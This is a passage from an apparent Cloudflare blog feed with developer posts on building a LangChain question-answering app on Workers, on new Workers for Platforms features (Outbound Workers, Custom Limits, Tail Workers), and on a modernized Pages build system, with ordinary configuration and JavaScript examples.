            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7qjMlbP8yfVegK2PT9BPm/31015f843d9a5dd7ad1d80f100da91f7/image3-18.png" />
            
            </figure><p>Even though our text is split into multiple documents, we still need to be able to understand what text is relevant to our question and should be sent to our language model. To do this, we’re going to introduce two new concepts – <a href="https://www.cloudflare.com/learning/ai/what-are-embeddings/">embeddings</a> and <a href="https://www.cloudflare.com/learning/ai/what-is-vector-database/">vector stores</a>.</p><p>Embeddings are a way of representing text with numerical data. For our application we’ll be using <a href="https://platform.openai.com/docs/guides/embeddings">OpenAI Embeddings</a> to generate our embeddings based on the document objects we just created. When you generate embeddings, the result is a vector of floating-point numbers, which makes it easier for computers to measure how related strings of text are to each other. For each document object we pass to the embedding API, a vector will be created.</p>
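<p>To make “relatedness” concrete, here’s a small self-contained sketch (illustrative only, not part of the tutorial code) that compares toy embedding vectors with cosine similarity, one common way of measuring how close two vectors are:</p>

```javascript
// Dot product of two equal-length vectors.
const dot = (a, b) => a.reduce((sum, x, i) => sum + x * b[i], 0);

// Cosine similarity: 1 means "pointing the same way" (very related),
// values near 0 mean largely unrelated.
function cosineSimilarity(a, b) {
  return dot(a, b) / Math.sqrt(dot(a, a) * dot(b, b));
}

// Toy three-dimensional "embeddings" (real embedding vectors have
// hundreds or thousands of dimensions).
const historyChunk1 = [0.9, 0.1, 0.2];
const historyChunk2 = [0.85, 0.15, 0.25];
const climateChunk = [0.1, 0.9, 0.1];

console.log(
  cosineSimilarity(historyChunk1, historyChunk2) >
  cosineSimilarity(historyChunk1, climateChunk)
); // true: the two history chunks are more related than history vs. climate
```

<p>A vector store runs a comparison like this across all your documents to find the ones closest to your question.</p>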
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6WDcDosuQet5YbgNuU1ZQG/657e7684615f81785e69a4cb5fc03be9/image2-28.png" />
            
            </figure><p>When we compare vectors, the closer the numbers are to each other, the more related the strings are. Conversely, the further apart the numbers are, the less related the strings are. It can be helpful to visualize how these numbers would allow us to place each document in a virtual space:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bngW4Ms4zz7PZIAZxnR2F/31f66eabc1b8b6b7630fe8bff4ce80f7/image1-47.png" />
            
            </figure><p>In this illustration, you could imagine how the text in the document objects that are bunched together would be more similar than the document object further off. The grouped documents could be text pulled from the article’s section on the history of Brooklyn. It’s a longer section that would have been split into multiple documents by our text splitter. But even though the text was split, the embeddings would allow us to know these chunks are closely related to each other. Meanwhile, the document further away could be the text on the climate of Brooklyn. This section was smaller, not split into multiple documents, and the current climate is not as related to the history of Brooklyn, so it’s placed further away.</p><p>Embeddings are a pretty fascinating and complicated topic. If you’re interested in understanding more, here's a <a href="https://www.youtube.com/watch?v=5MaWmXwxFNQ">great explainer video</a> that takes an in-depth look at embeddings.</p><p>Once you’ve generated your documents and embeddings, you need to store them someplace for future querying. Vector stores are a kind of database optimized for storing &amp; querying documents and their embeddings. For our vector store, we’ll be using <a href="https://js.langchain.com/docs/modules/indexes/vector_stores/integrations/memory">MemoryVectorStore</a> which is an ephemeral in-memory vector store. LangChain also has support for many of your favorite vector databases like <a href="https://js.langchain.com/docs/modules/indexes/vector_stores/integrations/chroma">Chroma</a> and <a href="https://js.langchain.com/docs/modules/indexes/vector_stores/integrations/pinecone">Pinecone</a>.</p><p>We’ll start by adding imports for OpenAIEmbeddings and MemoryVectorStore at the top of our file:</p>
            <pre><code>import { OpenAIEmbeddings } from "langchain/embeddings/openai";
import { MemoryVectorStore } from "langchain/vectorstores/memory";</code></pre>
            <p>Then we can remove the <code>console.log()</code> function we had in place to show how our loader worked and replace it with the code to create our embeddings and vector store:</p>
            <pre><code>const store = await MemoryVectorStore.fromDocuments(docs, new OpenAIEmbeddings({ openAIApiKey: env.OPENAI_API_KEY}));</code></pre>
            <p>With our text loaded into documents, our embeddings created, and both stored in a vector store, we can now query our text with our language model. To do that, we’re going to introduce the last two concepts that are core to building this application – <a href="https://js.langchain.com/docs/modules/models/">models</a> and <a href="https://js.langchain.com/docs/modules/chains/">chains</a>.</p><p>When you see models in LangChain, it’s not about generating or creating models. Instead, LangChain provides a standard interface that lets you access many different language models. In this app, we’ll be using the <a href="https://js.langchain.com/docs/modules/models/llms/integrations#openai">OpenAI model</a>.</p><p>Chains enable you to combine a language model with other sources of information, APIs, or even other language models. In our case, we’ll be using the <a href="https://js.langchain.com/docs/modules/chains/index_related_chains/retrieval_qa">RetrievalQAChain</a>. This chain retrieves the documents from our vector store related to a question and then uses our model to answer the question using that information.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/17hBMkJMZe5P3UHUfdCmCl/db5da651d7f7c204a31d0729fe9f6c5d/image4-18.png" />
            
            </figure><p>To start, we’ll add these two imports to the top of our file:</p>
            <pre><code>import { OpenAI } from "langchain/llms/openai";
import { RetrievalQAChain } from "langchain/chains";</code></pre>
            <p>Then we can put this all into action by adding the following code after we create our vector store:</p>
            <pre><code>        const model = new OpenAI({ openAIApiKey: env.OPENAI_API_KEY});
        const chain = RetrievalQAChain.fromLLM(model, store.asRetriever());

        const question = "What is this article about? Can you give me 3 facts about it?";

        const res = await chain.call({
            query: question,
        });

        return new Response(res.text); </code></pre>
            <p>In this code the first line is where we instantiate our model interface and pass it our API key. Next we create a chain passing it our model and our vector store. As mentioned earlier, we’re using a RetrievalQAChain which will look in our vector store for documents related to our query and then use those documents to get an answer for our query from our model.</p><p>With our chain created, we can call the chain by passing in the query we want to ask. Finally, we send the response text we got from our chain as the response to the request our Worker received. This will allow us to see the response in our browser.</p><p>With all our code in place, let’s test it again by running <code>npx wrangler dev</code>. This time when you open your browser you will see a few facts about Brooklyn:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Eb3EUM6vGAZVPf1nlkxs/8169139105040b3ac58fa7171791775b/image6-9.png" />
            
            </figure><p>Right now, the question we’re asking is hard coded. Our goal was to be able to use LangChain to ask any question we want about this article. Let’s update our code to allow us to pass the question we want to ask in our request. In this case, we’ll pass a question as an argument in the query string (e.g. <i>?question=When was Brooklyn founded</i>). To do this we’ll replace the line we’re currently assigning our question with the code needed to pull a question from our query string:</p>
            <pre><code>        const { searchParams } = new URL(request.url);
        const question = searchParams.get('question') ?? "What is this article about? Can you give me 3 facts about it?";</code></pre>
            <p>This code pulls all the query parameters from our URL using the URL object’s native <a href="https://developer.mozilla.org/en-US/docs/Web/API/URL/searchParams">searchParams property</a>, and gets the value passed in for the “question” parameter. If a value isn’t present for the “question” parameter, we’ll use the default question text we were using previously thanks to <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Nullish_coalescing">JavaScript’s nullish coalescing operator</a>.</p><p>With this update, run <code>npx wrangler dev</code> and this time visit your <a href="http://127.0.0.1:8787/?question=When%20was%20Brooklyn%20founded?">local URL with a question query string added</a>. Now instead of giving us a few fun facts about Brooklyn, we get the answer to when Brooklyn was founded. You can try this with any question you may have about Brooklyn. Or you can switch out the URL in our document loader and try asking similar questions about different Wikipedia articles.</p><p>With our code working locally, we can deploy it with <code>npx wrangler publish</code>. After this command completes you’ll receive a Workers URL that runs your code.</p>
    <div>
      <h3>You + LangChain + Cloudflare Workers</h3>
      <a href="#you-langchain-cloudflare-workers">
        
      </a>
    </div>
    <p>You can find our full LangChain example application on <a href="https://github.com/rickyrobinett/langchainjs-workers">GitHub</a>. We can’t wait to see what you all build with LangChain and Cloudflare Workers. Join us on <a href="https://discord.com/invite/cloudflaredev">Discord</a> or tag us on <a href="https://www.twitter.com/cloudflaredev">Twitter</a> as you’re building. And if you’re ever having any trouble or questions, you can ask on <a href="https://community.cloudflare.com/">community.cloudflare.com</a>.</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div></div> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Serverless]]></category>
            <guid isPermaLink="false">3PgqHl1LP0y4eOryCewoYN</guid>
            <dc:creator>Ricky Robinett</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare is powering the next generation of platforms with Workers]]></title>
            <link>https://blog.cloudflare.com/powering-platforms-on-workers/</link>
            <pubDate>Thu, 18 May 2023 13:00:01 GMT</pubDate>
            <description><![CDATA[ Workers for Platforms is our Workers offering for customers building new platforms on Cloudflare Workers. Let’s take a look back and recap why we built Workers for Platforms, show you some of the most interesting problems our customers have been solving and share new features that are now available! ]]></description>
            <content:encoded><![CDATA[ <p></p><p>We launched Workers for Platforms, our Workers offering for SaaS businesses, almost exactly one year ago to the date! We’ve seen a wide array of customers using Workers for Platforms – from e-commerce to CMS, low-code/no-code platforms and also a new wave of AI businesses running tailored inference models for their end customers!</p><p>Let’s take a look back and recap why we built Workers for Platforms, show you some of the most interesting problems our customers have been solving and share new features that are now available!</p>
    <div>
      <h2>What is Workers for Platforms?</h2>
      <a href="#what-is-workers-for-platforms">
        
      </a>
    </div>
    <p>SaaS businesses are all too familiar with the never ending need to keep up with their users' feature requests. Thinking back, the introduction of Workers at Cloudflare was to solve this very pain point. Workers gave our customers the power to program our network to meet their specific requirements!</p><p>Need to implement complex load balancing across many origins? <i>Write a Worker.</i> Want a custom set of WAF rules for each region your business operates in? <i>Go crazy, write a Worker.</i></p><p>We heard the same themes coming up with our customers – which is why we partnered with early customers to build Workers for Platforms. We worked with the Shopify Oxygen team early on in their journey to create a built-in hosting platform for Hydrogen, their Remix-based eCommerce framework. Shopify’s Hydrogen/Oxygen combination gives their merchants the flexibility to build out personalized shopping for buyers. It’s an experience that storefront developers can make their own, and it’s powered by Cloudflare Workers behind the scenes. For more details, check out Shopify’s “<a href="https://shopify.engineering/how-we-built-oxygen">How we Built Oxygen</a>” blog post.</p><blockquote><p><i>Oxygen is Shopify's built-in hosting platform for Hydrogen storefronts, designed to provide users with a seamless experience in deploying and managing their ecommerce sites. Our integration with Workers for Platforms has been instrumental to our success in providing fast, globally-available, and secure storefronts for our merchants. The flexibility of Cloudflare's platform has allowed us to build delightful merchant experiences that integrate effortlessly with the best that the Shopify ecosystem has to offer.</i><i>-</i> <b>Lance Lafontaine</b>, Senior Developer <a href="https://shopify.dev/docs/custom-storefronts/oxygen">Shopify Oxygen</a></p></blockquote><p>Another customer that we’ve been working very closely with is Grafbase. 
Grafbase started out on the <a href="https://www.cloudflare.com/forstartups/?ref=blog.cloudflare.com">Cloudflare for Startups</a> program, building their company from the ground up on Workers. Grafbase gives their customers the ability to deploy serverless GraphQL backends instantly. On top of that, their developers can build custom GraphQL resolvers to program their own business logic right at the edge. Using Workers and Workers for Platforms means that Grafbase can focus their team on building Grafbase, rather than having to focus on building and architecting at the infrastructure layer.</p><blockquote><p><i>Our mission at Grafbase is to enable developers to deploy globally fast GraphQL APIs without worrying about complex infrastructure. We provide a unified data layer at the edge that accelerates development by providing a single endpoint for all your data sources. We needed a way to deploy serverless GraphQL gateways for our customers with fast performance globally without cold starts. We experimented with container-based workloads and FaaS solutions, but turned our attention to WebAssembly (Wasm) in order to achieve our performance targets. We chose Rust to build the Grafbase platform for its performance, type system, and its Wasm tooling. Cloudflare Workers was a natural fit for us given our decision to go with Wasm. On top of using Workers to build our platform, we also wanted to give customers the control and flexibility to deploy their own logic. Workers for Platforms gave us the ability to deploy customer code written in JavaScript/TypeScript or Wasm straight to the edge.</i><i>-</i> <b>Fredrik Björk</b>, Founder &amp; CEO at <a href="https://grafbase.com/">Grafbase</a></p></blockquote><p>Over the past year, it’s been incredible seeing the velocity that building on Workers allows companies both big and small to move at.</p>
    <div>
      <h2>New building blocks</h2>
      <a href="#new-building-blocks">
        
      </a>
    </div>
    <p>Workers for Platforms uses <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/learning/how-workers-for-platforms-works/#dynamic-dispatch-worker">Dynamic Dispatch</a> to give our customers, like Shopify and Grafbase, the ability to run their own Worker before user code that’s written by Shopify and Grafbase’s developers is executed. With Dynamic Dispatch, Workers for Platforms customers (referred to as platform customers) can authenticate requests, add context to a request or run any custom code before their developer’s Workers (referred to as user Workers) are called.</p><p>This is a key building block for Workers for Platforms, but we’ve also heard requests for even more levels of visibility and control from our platform customers. Delivering on this theme, we’re releasing three new highly requested features:</p>
    <div>
      <h3>Outbound Workers</h3>
      <a href="#outbound-workers">
        
      </a>
    </div>
    <p>Dynamic Dispatch gives platforms visibility into all incoming requests to their user’s Workers, but customers have also asked for visibility into all outgoing requests from their user’s Workers in order to do things like:</p><ul><li><p>Log all subrequests in order to identify malicious hosts or usage patterns</p></li><li><p>Create allow or block lists for hostnames requested by user Workers</p></li><li><p>Configure authentication to your APIs behind the scenes (without end developers needing to set credentials)</p></li></ul><p>Outbound Workers sit between user Workers and fetch() requests out to the Internet. User Workers will trigger a <a href="https://developers.cloudflare.com/workers/runtime-apis/fetch-event/">FetchEvent</a> on the Outbound Worker and from there platform customers have full visibility over the request before it’s sent out.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/74ISEbqaIX58uc6z88wV0s/28a040fdb9e044b8420dbf7930bf27aa/image1-48.png" />
            
            </figure><p>It’s also important to have context in the Outbound Worker to answer questions like “which user Worker is this request coming from?”. You can declare variables to pass through to the Outbound Worker in the dispatch namespaces binding:</p>
            <pre><code>[[dispatch_namespaces]]
binding = "dispatcher"
namespace = "&lt;NAMESPACE_NAME&gt;"
outbound = { service = "&lt;SERVICE_NAME&gt;", parameters = ["customer_name", "url"] }</code></pre>
            <p>From there, the variables declared in the binding can be accessed in the Outbound Worker through <code>env.&lt;VAR_NAME&gt;</code>.</p>
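<p>As a sketch of what this enables, an Outbound Worker could enforce a hostname allow-list before forwarding subrequests. The host names and allow-list below are hypothetical, not a prescribed API:</p>

```javascript
// Hypothetical allow-list of hosts that user Workers may call.
const ALLOWED_HOSTS = new Set(["api.example.com", "cdn.example.com"]);

const outbound = {
  async fetch(request, env) {
    // env.customer_name and env.url would hold the parameters declared in
    // the dispatch namespace binding (illustrative names).
    const { hostname } = new URL(request.url);
    if (ALLOWED_HOSTS.has(hostname) === false) {
      // Block subrequests to hosts outside the allow-list.
      return new Response(`Host ${hostname} is not allowed`, { status: 403 });
    }
    // The request could also be logged, or given credentials, here
    // before being forwarded to the Internet.
    return fetch(request);
  },
};
// In a real Worker, outbound would be the script's default export.
```

<p>Because this is just Worker code, the same pattern extends naturally to logging subrequests or injecting per-customer credentials.</p>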
    <div>
      <h3>Custom Limits</h3>
      <a href="#custom-limits">
        
      </a>
    </div>
    <p>Workers are really powerful, but, as a platform, you may want guardrails around their capabilities to shape your pricing and packaging model. For example, if you run a freemium model on your platform, you may want to set a lower CPU time limit for customers on your free tier.</p><p>Custom Limits let you set usage caps for CPU time and number of subrequests on your customer’s Workers. Custom limits are set from within your dynamic dispatch Worker allowing them to be dynamically scripted. They can also be combined to set limits based on <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/platform/tags/">script tags</a>.</p><p>Here’s an example of a Dynamic Dispatch Worker that puts both Outbound Workers and Custom Limits together:</p>
            <pre><code>export default {
  async fetch(request, env) {
    try {
      const workerName = new URL(request.url).host.split('.')[0];
      const userWorker = env.dispatcher.get(
        workerName,
        {},
        {
          // outbound arguments
          outbound: {
            customer_name: workerName,
            url: request.url,
          },
          // set limits
          limits: { cpuMs: 10, subRequests: 5 },
        }
      );
      return await userWorker.fetch(request);
    } catch (e) {
      if (e.message.startsWith('Worker not found')) {
        return new Response('', { status: 404 });
      }
      return new Response(e.message, { status: 500 });
    }
  },
};</code></pre>
            <p>They’re both incredibly simple to configure, and the best part – the configuration is completely programmatic. You have the flexibility to build on both of these features with your own custom logic!</p>
    <div>
      <h3>Tail Workers</h3>
      <a href="#tail-workers">
        
      </a>
    </div>
    <p>Live logging is an essential piece of the developer experience. It allows developers to monitor for errors and troubleshoot in real time. On Workers, giving users real-time logs through <code>wrangler tail</code> is a feature that developers love! Now with Tail Workers, platform customers can give their users the same level of visibility to provide a faster debugging experience.</p><p>Tail Worker logs contain metadata about the original trigger event (like the incoming URL and status code for fetches), console.log() messages, and any unhandled exceptions. Tail Workers can be added to the Dynamic Dispatch Worker in order to capture logs from both the Dynamic Dispatch Worker and any user Workers that are called.</p><p>A Tail Worker can be configured by adding the following to the <code>wrangler.toml</code> file of the producing script:</p>
            <pre><code>tail_consumers = [{service = "&lt;TAIL_WORKER_NAME&gt;", environment = "&lt;ENVIRONMENT_NAME&gt;"}]</code></pre>
            <p>From there, events are captured in the Tail Worker using a new tail handler:</p>
            <pre><code>export default {
  async tail(events) {
    await fetch("https://example.com/endpoint", {
      method: "POST",
      body: JSON.stringify(events),
    });
  },
};</code></pre>
            <p>Tail Workers are full-fledged Workers empowered by the usual Worker ecosystem. You can send events to any HTTP endpoint, such as a logging service that parses the events and passes real-time logs on to customers.</p>
    <div>
      <h2>Try it out!</h2>
      <a href="#try-it-out">
        
      </a>
    </div>
    <p>All three of these features are now in open beta for users with access to Workers for Platforms. For more details, and to try them out for yourself, check out our developer documentation:</p><ul><li><p><a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/platform/outbound-workers/">Outbound Workers</a></p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/platform/custom-limits/">Custom Limits</a></p></li><li><p><a href="https://developers.cloudflare.com/workers/platform/tail-workers">Tail Workers</a></p></li></ul><p>Workers for Platforms is an enterprise-only product (for now) but we’ve heard a lot of interest from developers. In the latter half of the year, we’ll be bringing Workers for Platforms down to our pay-as-you-go plan! In the meantime, if you’re itching to get started, reach out to us through the <a href="https://discord.cloudflare.com/">Cloudflare Developer Discord</a> (channel name: workers-for-platforms).</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div></div> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">6KYE0S5UOjVcVum73JwOp0</guid>
            <dc:creator>Nathan Disidore</dc:creator>
            <dc:creator>Tanushree Sharma</dc:creator>
        </item>
        <item>
            <title><![CDATA[Modernizing the toolbox for Cloudflare Pages builds]]></title>
            <link>https://blog.cloudflare.com/moderizing-cloudflare-pages-builds-toolbox/</link>
            <pubDate>Wed, 17 May 2023 13:00:37 GMT</pubDate>
            <description><![CDATA[ A new beta build system is now available for Cloudflare Pages. We've updated our default languages and tools, and made some exciting underlying architecture changes. You can enable it in your project settings in the dashboard today. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2lME1CWawsCQtIuzvvfLPq/b037a9c82151e6976cb0ed220573ad80/image2-22.png" />
            
            </figure><p>Cloudflare Pages <a href="/cloudflare-pages/">launched</a> over two years ago in December 2020, and since then, we have grown Pages to build millions of deployments for developers. In May 2022, to support developers with more complex requirements, we opened up Pages to empower developers to <a href="/cloudflare-pages-direct-uploads/">create deployments using their own build environments</a> — but that wasn't the end of our journey. Ultimately, we want to be able to allow anyone to use our build platform and take advantage of the git integration we offer. You should be able to connect your repository and have it <i>just work</i> on Cloudflare Pages.</p><p>Today, we're introducing a new beta version of our build system (a.k.a. "build image") which brings the default set of tools and languages up-to-date, and sets the stage for future improvements to builds on Cloudflare Pages. We now support the latest versions of Node.js, Python, Hugo and many more, putting you on the best path for any new projects that you undertake. Existing projects will continue to use the current build system, but this upgrade will be available to opt-in for everyone.</p>
    <div>
      <h2>New defaults, new possibilities</h2>
      <a href="#new-defaults-new-possibilities">
        
      </a>
    </div>
    <p>The Cloudflare Pages build system has been updated to not only support new versions of your favorite languages and tools, but to also include new versions by default. The versions of 2020 are no longer relevant for the majority of today's projects, and as such, we're bumping these to their more modern equivalents:</p><ul><li><p><b>Node.js</b>' default is being increased from 12.18.0 to 18.16.0,</p></li><li><p><b>Python</b> 2.7.18 and 3.10.5 are both now available by default,</p></li><li><p><b>Ruby</b>'s default is being increased from 2.7.1 to 3.2.2,</p></li><li><p><b>Yarn</b>'s default is being increased from 1.22.4 to 3.5.1,</p></li><li><p>And we're adding <b>pnpm</b> with a default version of 8.2.0.</p></li></ul><p>These are just some of the headlines — check out <a href="https://developers.cloudflare.com/pages/platform/language-support-and-tools/">our documentation</a> for the full list of changes.</p><p>We're aware that these new defaults constitute a breaking change for anyone using a project without pinning their versions with an environment variable or version file. That's why we're making this new build system opt-in for existing projects. You'll be able to stay on the existing system without breaking your builds. If you do decide to adventure with us, we make it easy to test out the new system in your preview environments before rolling out to production.</p>
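<p>As a reminder, the new defaults only apply when a project hasn’t pinned its own versions. Pinning looks something like this (illustrative version number): either an environment variable on the project, for example:</p>

```
NODE_VERSION=16.18.0
```

<p>or a version file such as <code>.nvmrc</code> in the root of your repository containing the version number. Pinned projects are unaffected by changes to the defaults.</p>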
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/265Kkauu3hg7i7PgW6l9IC/ac785539cffcfd46c52ca0e01b70b306/image5-5.png" />
            
            </figure><p>Additionally, we're now making your builds more reproducible by taking advantage of lockfiles with many package managers. <code>npm ci</code> and <code>yarn --pure-lockfile</code> are now used ahead of your build command in this new version of the build system.</p><p>For new projects, these updated defaults and added support for pnpm and Yarn 3 mean that more projects will just work immediately without any undue setup, tweaking, or configuration. Today, we're launching this update as a beta, but we will be quickly promoting it to general availability once we're satisfied with its stability. Once it does graduate, new projects will use this updated build system by default.</p><p>We know that this update has been a long-standing request from our users (we thank you for your patience!) but part of this rollout is ensuring that we are now in a better position to make regular updates to Cloudflare Pages' build system. You can expect these default languages and tools to now keep pace with the rapid rate of change seen in the world of web development.</p><p>We very much welcome your continued feedback as we know that new tools can quickly appear on the scene, and old ones can just as quickly drop off. As ever, our <a href="https://discord.com/invite/cloudflaredev">Discord server</a> is the best place to engage with the community and Pages team. We’re excited to hear your thoughts and suggestions.</p>
    <div>
      <h2>Our modular and scalable architecture</h2>
      <a href="#our-modular-and-scalable-architecture">
        
      </a>
    </div>
    <p>Powering this updated build system is a new architecture that we've been working on behind-the-scenes. <a href="/cloudflare-pages-build-improvements/">We're no strangers to sweeping changes of our build infrastructure</a>: we've done a lot of work to grow and scale our infrastructure. Moving beyond purely <a href="https://www.cloudflare.com/developer-platform/solutions/hosting/">static site hosting</a> with <a href="/cloudflare-pages-goes-full-stack/">Pages Functions</a> brought a new wave of users, and as we explore <a href="/pages-and-workers-are-converging-into-one-experience">convergence</a> with Workers, we expect even more developers to rely on our git integrations and CI builds. Our new architecture is being rolled out without any changes affecting users, so unless you're interested in the technical nitty-gritty, feel free to stop reading!</p><p>The biggest change we're making with our architecture is its modularity. Previously, we were using Kubernetes to run a monolithic container which was responsible for everything for the build. Within the same image, we'd stream our build logs, clone the git repository, install any custom versions of languages and tools, install a project's dependencies, run the user's build command, and upload all the assets of the build. This was a lot of work for one container! It meant that our system tooling had to be compatible with versions in the user's space and therefore new default versions were a massive change to make. This is a big part of why it took us so long to be able to update the build system for our users.</p><p>In the new architecture, we've broken these steps down into multiple separate containers. 
We make use of <a href="https://kubernetes.io/docs/concepts/workloads/pods/init-containers/">Kubernetes' init containers feature</a> and instead of one monolithic container, we have three that execute sequentially:</p><ol><li><p>clone a user's git repository,</p></li><li><p>install any custom versions of languages and tools, install a project's dependencies, run the user's build command, and</p></li><li><p>upload all the assets of a build.</p></li></ol><p>We use a <a href="https://kubernetes.io/docs/tasks/access-application-cluster/communicate-containers-same-pod-shared-volume/">shared volume</a> to give the build a persistent workspace to use between containers, but now there is clear isolation between <b>system</b> stages (cloning a repository and uploading assets) and <b>user</b> stages (running code that the user is responsible for). We no longer need to worry about conflicting versions, and we've created an additional layer of security by isolating a user's control to a separate environment.</p>
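<p>As a rough sketch of the shape this takes (the names and images below are hypothetical, not our actual manifests), the build pod conceptually looks like this:</p>

```yaml
# Conceptual sketch only: names and images are made up.
apiVersion: v1
kind: Pod
spec:
  volumes:
    - name: workspace              # shared scratch space for all three stages
      emptyDir: {}
  initContainers:
    - name: clone                  # system stage: clone the git repository
      image: pages-build-clone
      volumeMounts:
        - { name: workspace, mountPath: /workspace }
    - name: build                  # user stage: install tools and dependencies,
      image: pages-build-run       # then run the user's build command
      volumeMounts:
        - { name: workspace, mountPath: /workspace }
  containers:
    - name: upload                 # system stage: upload the build's static assets
      image: pages-build-upload
      volumeMounts:
        - { name: workspace, mountPath: /workspace }
```

<p>Because Kubernetes runs init containers to completion one at a time before starting the main container, the three stages execute strictly in order while sharing the <code>workspace</code> volume.</p>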
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/11McSSl7sZWok1UdR8EuRV/35bb07d37152065d5870c24813ac8d73/1-6.png" />
            
            </figure><p>We're also aligning the final stage, the one responsible for uploading static assets, with the same APIs that Wrangler uses for Direct Upload projects. This reduces our maintenance burden going forward since we'll only need to consider one way of uploading assets and creating deployments. As we consolidate, we're exploring ways to make these APIs even faster and more reliable.</p>
    <div>
      <h3>Logging out</h3>
      <a href="#logging-out">
        
      </a>
    </div>
    <p>You might have noticed that we haven't yet talked about how we're continuing to stream build logs. Arguably, this was one of the most challenging pieces to work out. When everything ran in a single container, we were able to simply latch directly into the <code>stdout</code> of our various stages and pipe them through to a Durable Object which could communicate with the Cloudflare dashboard.</p><p>By introducing this new isolation between containers, we had to get a bit more inventive. After prototyping a number of approaches, we've found one that we like. We run a separate, global log collector container inside Kubernetes which is responsible for collating logs from a build, and passing them through to that same Durable Object infrastructure. The one caveat is that the logs now need to be annotated with which build they are coming from, since one global log collector container accepts logs from multiple builds. A Worker in front of the Durable Object is responsible for reading the annotation and delegating to the relevant build's Durable Object instance.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6liD6t03jOlyaUug44A7gQ/9e6fec6d6b8864b187353872d9744cd4/image1-40.png" />
            
            </figure>
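<p>The delegation step can be sketched in plain JavaScript. The batch shape (a <code>buildId</code> annotation alongside the log lines) and the binding name <code>BUILD_LOGS</code> are assumptions made for illustration, not our actual schema:</p>

```javascript
// Sketch of the routing Worker in front of the Durable Object.
// The log collector tags each batch with the build it came from;
// the Worker reads that annotation and forwards the batch to the
// Durable Object instance owned by that build.

// Pure helper: extract the build annotation from a log batch.
function buildIdOf(batch) {
  if (!batch || typeof batch.buildId !== "string") {
    throw new Error("log batch missing build annotation");
  }
  return batch.buildId;
}

// Worker-style handler (shown as a plain object so the sketch is
// self-contained; in a real Worker this would be the default export).
const logRouter = {
  async fetch(request, env) {
    const batch = await request.json();
    // One Durable Object instance per build: derive its id from the annotation.
    const id = env.BUILD_LOGS.idFromName(buildIdOf(batch));
    return env.BUILD_LOGS.get(id).fetch(request);
  },
};
```

<p>The interesting property is that the collector stays completely generic: only this thin routing layer knows how annotations map to Durable Object instances.</p>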
    <div>
      <h3>Caching in</h3>
      <a href="#caching-in">
        
      </a>
    </div>
    <p>With this new modular architecture, we plan to integrate a feature we've been teasing for a while: build caching. Today, when you run a build in Cloudflare Pages, we start fresh every time. This works, but it's inefficient.</p><p>Very often, only small changes are actually made to your website between deployments: you might tweak some text on your homepage, or add a new blog post; but rarely does the core foundation of your site actually change between deployments. With build caching, we can reuse some of the work from earlier builds to speed up subsequent builds. We'll offer a best-effort storage mechanism that allows you to persist and restore files between builds. You'll soon be able to cache dependencies, as well as the build output itself if your framework supports it, resulting in considerably faster builds and a tighter feedback loop from push to deploy.</p><p>This is possible because our new modular design has clear divides between the stages where we'd want to restore and cache files.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/YcQdgswXh6aueVEkJkBGK/020e5a74f78b9c8a961cda57c623c69c/2-3.png" />
            
            </figure>
    <div>
      <h2>Start building</h2>
      <a href="#start-building">
        
      </a>
    </div>
    <p>We're excited about the improvements that this new modular architecture will afford the Pages team, but we're even more excited for how this will result in faster and more scalable builds for our users. This architecture transition is rolling out behind the scenes, but <b>the updated beta build system with new languages and tools is available to try today</b>. Navigate to your Pages project settings in the Cloudflare Dashboard to opt in.</p><p>Let us know if you have any feedback on the <a href="https://discord.com/invite/cloudflaredev">Discord server</a>, and stay tuned for more information about build caching in upcoming posts on this blog. Later today (Wednesday, May 17, 2023), the Pages team will be hosting a <a href="https://discord.com/invite/cloudflaredev?event=1103324690149298196">Q&amp;A session</a> to talk about this announcement on Discord at 17:30 UTC.</p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare Pages]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <guid isPermaLink="false">3CewNJiFa5g7gsagtQab5V</guid>
            <dc:creator>Greg Brimble</dc:creator>
        </item>
        <item>
            <title><![CDATA[Improved local development with wrangler and workerd]]></title>
            <link>https://blog.cloudflare.com/wrangler3/</link>
            <pubDate>Wed, 17 May 2023 13:00:15 GMT</pubDate>
            <description><![CDATA[ We’re proud to announce the release of Wrangler v3 – the first version of Wrangler with local-by-default development, powered by Miniflare v3 and the open-source Workers `workerd` runtime. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3iSHHNyNYsb21AEw80h3lW/953b982411c18fcb0721afc8dd83ac7e/image5-7.png" />
            
